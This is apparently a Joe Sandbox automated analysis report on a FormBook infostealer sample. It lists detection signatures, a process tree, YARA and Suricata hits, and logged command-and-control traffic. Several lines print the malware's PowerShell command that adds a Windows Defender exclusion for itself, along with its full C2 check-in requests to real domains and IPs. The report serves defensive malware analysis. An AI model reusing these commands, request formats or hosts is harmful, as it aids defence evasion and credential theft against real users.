Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r9856_7.exe

Overview

General Information

Sample name:r9856_7.exe
Analysis ID:1509673
MD5:6abb344635c64e538866f0e7386e2568
SHA1:072c594929e33401604f6e4f184f2ed78b4e38c2
SHA256:a5273ce78432a8f34e120ecd96da8681ece96ce8b54cc6eec68c0088c483b8ec
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • r9856_7.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\r9856_7.exe" MD5: 6ABB344635C64E538866F0E7386E2568)
    • powershell.exe (PID: 5948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7232 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • r9856_7.exe (PID: 5952 cmdline: "C:\Users\user\Desktop\r9856_7.exe" MD5: 6ABB344635C64E538866F0E7386E2568)
      • NhrnLLOsLetD.exe (PID: 2816 cmdline: "C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdkey.exe (PID: 7396 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • NhrnLLOsLetD.exe (PID: 5428 cmdline: "C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7660 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x90325:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x78504:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ba00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13bdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.r9856_7.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.r9856_7.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e0f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x162d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.r9856_7.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.r9856_7.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2eef3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x170d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\r9856_7.exe", ParentImage: C:\Users\user\Desktop\r9856_7.exe, ParentProcessId: 6648, ParentProcessName: r9856_7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", ProcessId: 5948, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\r9856_7.exe", ParentImage: C:\Users\user\Desktop\r9856_7.exe, ParentProcessId: 6648, ParentProcessName: r9856_7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", ProcessId: 5948, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\r9856_7.exe", ParentImage: C:\Users\user\Desktop\r9856_7.exe, ParentProcessId: 6648, ParentProcessName: r9856_7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", ProcessId: 5948, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T22:54:47.970266+020020507451Malware Command and Control Activity Detected192.168.2.759660154.23.184.21880TCP
            2024-09-11T22:55:11.746854+020020507451Malware Command and Control Activity Detected192.168.2.759665152.53.38.080TCP
            2024-09-11T22:55:25.554231+020020507451Malware Command and Control Activity Detected192.168.2.75966923.225.34.7580TCP
            2024-09-11T22:55:38.710839+020020507451Malware Command and Control Activity Detected192.168.2.7596733.33.130.19080TCP
            2024-09-11T22:55:52.282540+020020507451Malware Command and Control Activity Detected192.168.2.75967765.108.194.4980TCP
            2024-09-11T22:56:06.275752+020020507451Malware Command and Control Activity Detected192.168.2.759681208.91.197.1380TCP
            2024-09-11T22:56:20.096078+020020507451Malware Command and Control Activity Detected192.168.2.75968576.223.113.16180TCP
            2024-09-11T22:56:33.495089+020020507451Malware Command and Control Activity Detected192.168.2.759689172.67.221.580TCP
            2024-09-11T22:56:47.204569+020020507451Malware Command and Control Activity Detected192.168.2.759693162.240.81.1880TCP
            2024-09-11T22:57:00.498635+020020507451Malware Command and Control Activity Detected192.168.2.759697162.0.213.9480TCP
            2024-09-11T22:57:13.948673+020020507451Malware Command and Control Activity Detected192.168.2.75970184.32.84.3280TCP
            2024-09-11T22:57:27.510291+020020507451Malware Command and Control Activity Detected192.168.2.75970535.214.33.20480TCP
            2024-09-11T22:57:40.658093+020020507451Malware Command and Control Activity Detected192.168.2.7597093.33.130.19080TCP
            2024-09-11T22:57:54.255424+020020507451Malware Command and Control Activity Detected192.168.2.759713199.59.243.22680TCP
            2024-09-11T22:58:16.140788+020020507451Malware Command and Control Activity Detected192.168.2.759717188.114.96.380TCP
            2024-09-11T22:58:25.786115+020020507451Malware Command and Control Activity Detected192.168.2.759718154.23.184.21880TCP
            2024-09-11T22:58:38.909718+020020507451Malware Command and Control Activity Detected192.168.2.759722152.53.38.080TCP
            2024-09-11T22:58:52.842736+020020507451Malware Command and Control Activity Detected192.168.2.75972623.225.34.7580TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: r9856_7.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: r9856_7.exeReversingLabs: Detection: 63%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: r9856_7.exeJoe Sandbox ML: detected
            Source: r9856_7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: r9856_7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NhrnLLOsLetD.exe, 00000007.00000002.3815465692.0000000000F6E000.00000002.00000001.01000000.0000000D.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3815330168.0000000000F6E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: cmdkey.pdbGCTL source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3814863192.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: r9856_7.exe, 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1545713405.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1543650837.000000000314C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r9856_7.exe, r9856_7.exe, 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000008.00000003.1545713405.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1543650837.000000000314C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: djdH.pdb source: r9856_7.exe
            Source: Binary string: cmdkey.pdb source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3814863192.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: djdH.pdbSHA256L source: r9856_7.exe
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A1BF60 FindFirstFileW,FindNextFileW,FindClose,8_2_00A1BF60
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4x nop then jmp 072DD3B2h0_2_072DCBDC
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then xor eax, eax8_2_00A09AB0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then pop edi8_2_00A0DBED
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then mov ebx, 00000004h8_2_033304E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59660 -> 154.23.184.218:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59673 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59669 -> 23.225.34.75:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59665 -> 152.53.38.0:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59689 -> 172.67.221.5:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59709 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59693 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59701 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59677 -> 65.108.194.49:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59697 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59713 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59717 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59726 -> 23.225.34.75:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59718 -> 154.23.184.218:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59685 -> 76.223.113.161:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59722 -> 152.53.38.0:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59681 -> 208.91.197.13:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59705 -> 35.214.33.204:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.maya24.xyz
            Source: DNS query: www.zimra.xyz
            Source: DNS query: www.personal-loans-jp8.xyz
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /3ozz/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=XDfkmZV0UpreXJRL4a+kMc+s40ElyBknavgDq4xpV4itK9/GJYtr4NsiaYcm7ir36wtKh4I9XU6sRfj+cMnrz2p6V2IZ5AA5gzUpK7TVcpLZf4ygGQ5VljQGU5XXJlbNz7qQtdD+VX81 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.57ddu.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7f48/?XvhP6L=Y/V9HWeQI6V9wDpav31Zmzk5MY4+Ou2xQiPhqUb5lc+p8ROSXtAF44jgGkfnSdbIjMV3KY+ys+uzmsyZr9wUrSReS7kDqE3Vwy5Stw7V8E2w1yWugNHB1ko6qS7b9UC1jiexBCRL4rzt&Xt7D=9p4tP8lp52ndpXM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.nuv3.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /u0n6/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=TnXPJRFedBjcAOKsz8A4RrjZJ/J8mpS0RRmNukYQVSavKw+Pr3ZL00k0+s6r1anvS9TkkUZZGYzdsNqRXNwCKrFNx4FeTSUtckB8ipahHKvydrXWZ9yissqQQy/l7XTEZmUeENIc2eR0 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.bashei.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /squz/?XvhP6L=Ghe6W9NY/2rmdpfmin3r4worEkhFv7TpyCLvYyDJFGDSfcbT98d0cG77XKGOFhcNgHgKwlDxqJr9ryKJWiSYVmpZriF7ZoTYlTDCrmWRZjH+de0P0vE8b0uWMMVzUUSCh4ryC6am+BcV&Xt7D=9p4tP8lp52ndpXM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.tigre777gg.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruhxF2seiA/QjkQNJaG2u4gbNAblhhoQ1gDEQNJfkHQy2ZHSzBRH3GV2HuvCcAuSJmx/oWCvWI&Xt7D=9p4tP8lp52ndpXM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.maya24.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pa4w/?XvhP6L=dKMHTeotdxQA3vuiSRDg588JUBKwJbza89FzR4k2/BlHdZNbjG9srDVj4iYsPfHZhZaT/x4F9RFLyq608nYJAYQb5LXQOtEiJ4lw7e+xANqPS8JKy934Fa9hsYgKS5KVWYuJXZeSCWTj&Xt7D=9p4tP8lp52ndpXM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.hiretemp.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /otqc/?XvhP6L=jk/2fo7CpY6PXlaYArzRtoo0AVLLUFDN/Jq+vkOaZ+fPrhUhiTNdX0aA543JRHsuzYf7ebB3TDQsHlnmoSav9wzbQDyRMAafsyNd6ddZozZF1KxmmUfcLkKv5xld9bF92o+2nx1DI9Jm&Xt7D=9p4tP8lp52ndpXM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.justlivn.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /d4mx/?XvhP6L=dY+cYSKR0CxOBgdKC/uIXP8qwtWtKpkmZkr6gQOthvr2txBeH3FPzsd2b0Ib6yOB9b4SVKkLzFRco8LgeUNZml6ApuBXHFQ5XcnL1KhmECBVWCNPjbmPvAwvE3fQeXhC94EGXV5DutCK&Xt7D=9p4tP8lp52ndpXM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.hemistryb.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a5gd/?XvhP6L=PudvrHhxWdfxtGGhQSPM4Nv1Dcz9A9OmcQNSz/CJh1KNnxIb2QXQvP51CacMS4xZciC0s5SL/yVXPvg6yOeNO+2G0wSJvvCXF5bk0r60CWn1bzRkQZzJoS1GIdNZy2RK3STysnFtIBWS&Xt7D=9p4tP8lp52ndpXM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.jeandreo.storeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /knrh/?XvhP6L=YgggYvzCIY9cxyt1YCa2G3R12OneF5/58fBG84NSPGW4/awNicu/ZN4HtGSklex6REK8bsR/OR3Y+MJqd7/88rmQQgGzhJF4KytM6w66NwsLhFIcz78jdTwuasaid4VzQcobuCXl81HP&Xt7D=9p4tP8lp52ndpXM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.zimra.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7fgk/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=jsI13KUmBZ1T5rh+bHmke0O+W3Z/A6nMw4DpVk3nSlnNNLSGuDQ/FPhySwGHE5L/lacb6zZ1lT+tB+A3kLGRxOtsHOzzZCR5pN3lBpoImaPzbOWkADZ6ueCTs7gp0g7tISQqu/NYQOSA HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.legitima.legalConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /i118/?XvhP6L=l78tjT99nfWmEsVDs1FvFZ9WuYye9a70xFpF/w9BItZXEYkJuJfqp9pdvrQptbQ2LO1yeOIECnfIu7s7S7+7Q3i1eKl3stoZZ1arBng6e4IDYKgW1i7918V1fhSLuSwuhzNanlWnB/aN&Xt7D=9p4tP8lp52ndpXM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.autochemtools.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
